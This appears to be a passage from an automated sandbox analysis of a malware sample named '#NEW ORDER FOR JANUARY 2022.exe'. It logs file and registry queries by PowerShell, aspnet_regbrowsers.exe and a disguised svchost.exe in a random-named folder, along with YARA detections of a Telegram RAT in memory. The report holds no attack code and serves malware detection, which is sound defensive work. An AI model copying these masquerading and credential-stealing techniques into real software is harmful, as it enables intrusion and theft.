                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
